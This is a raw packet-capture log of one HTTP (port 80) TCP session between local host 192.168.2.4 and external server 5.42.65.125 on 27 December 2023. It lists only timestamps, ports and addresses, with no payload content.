Dec 27, 2023 18:12:24.797990084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798000097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798011065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798021078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798810005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798820972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798933983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.798993111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.799040079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.799052954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.802056074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.805779934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805809975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805819988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805870056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.805885077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805895090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805903912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805916071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805922985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.805924892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.805939913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.806495905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806531906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.806579113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806590080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806598902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806610107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806618929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.806619883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806631088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806641102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.806643009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.806678057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.807385921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807398081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807408094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807419062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807430029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807440996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807446003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.807451963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807463884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.807465076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.807487011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.808270931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808283091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808324099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.808340073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808351040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808361053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808372021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808377028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.808383942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808394909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.808407068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.808439016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.810364962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810378075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810420990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.810441017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810451984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810462952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810473919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810476065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.810484886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810496092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810520887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.810595036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810606003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810621023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810630083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.810631990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810642958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810652971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.810652971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.810688019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.811115026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811126947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811137915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811148882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811160088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811161041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.811172962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811187983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.811212063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811223984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.811248064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.814068079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814080000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814090014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814099073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814109087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814119101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814124107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.814129114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814140081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814162970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.814440966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814496040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814542055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814546108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.814553022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814563036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814573050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.814600945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.814620018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814630985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814641953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.814668894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.815251112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815291882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.815314054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815325022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815357924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.815387964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815397978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815408945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815418959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815429926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.815433979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.815447092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.816119909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816131115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816155910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816174984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.816190958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.816191912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816240072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816266060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816272020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.816287041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816298008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.816334009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.817114115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817172050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817205906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.817235947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817270041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.817270994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817312956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817325115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817359924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.817377090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817409039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.817419052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817878962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817889929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.817929983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.818123102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818154097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.818166018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818185091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818245888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818257093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818278074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.818301916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.818308115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818367004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.818398952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.818404913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819044113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819055080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819065094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819076061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819084883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819093943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.819096088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819107056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819117069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.819117069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819153070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.819819927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819832087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819859028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819953918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819956064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.819964886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819976091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819987059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.819998026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.820018053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.820764065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.820775032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.820785046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.820796013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.820816994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.820842028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.821155071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821197033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821208000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821217060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821228027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821238041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821244001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.821259975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.821789026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821861029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821871996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821881056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821892023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821902037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.821902990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.821944952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.822504044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.822515011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.822524071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.822555065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.822562933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.822572947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.822583914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.822593927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.822619915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.825109005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825119972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825134993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825145960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825243950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825253963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.825274944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825285912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825319052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.825345039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825356960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825366020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825390100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825390100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.825402021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.825447083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.826476097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.826486111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.826497078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.826514006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.826515913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.826535940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.827007055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827018023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827027082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827038050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827065945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.827230930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827243090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827284098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.827620029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827630997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827692032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.827723026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827733040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827743053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.827769995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.827780008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.827786922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828280926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828290939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828327894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.828444958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828457117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828500986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.828546047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828557968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828584909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.828641891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828681946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.828726053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.829988003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.829999924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830054998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.830116987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830157995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.830161095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830183029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830194950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830230951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.830921888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830934048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.830985069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.830995083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831007004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831034899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.831829071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831841946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831888914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.831926107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831938028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831948996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831960917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.831964016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.831995964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.832381964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.832393885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.832436085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.832515001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.832551956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.832581997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.832632065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.832672119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.832726002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833446980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833458900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833487988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.833591938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833604097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833615065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833625078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833648920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.833679914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833693981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833703995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833715916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.833731890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.833758116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.834491968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834531069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.834552050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834563971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834574938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834587097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834592104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.834621906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.834662914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834675074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834686041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.834712982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.835314035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.835350037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.835361958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.835370064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.835372925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.835403919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.835767031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.835779905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.835817099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.837852001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.837886095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.837954044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.837965012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.837994099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.838056087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.838123083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.838135004 CET	80	49738	5.42.65.125	192.168.2.4
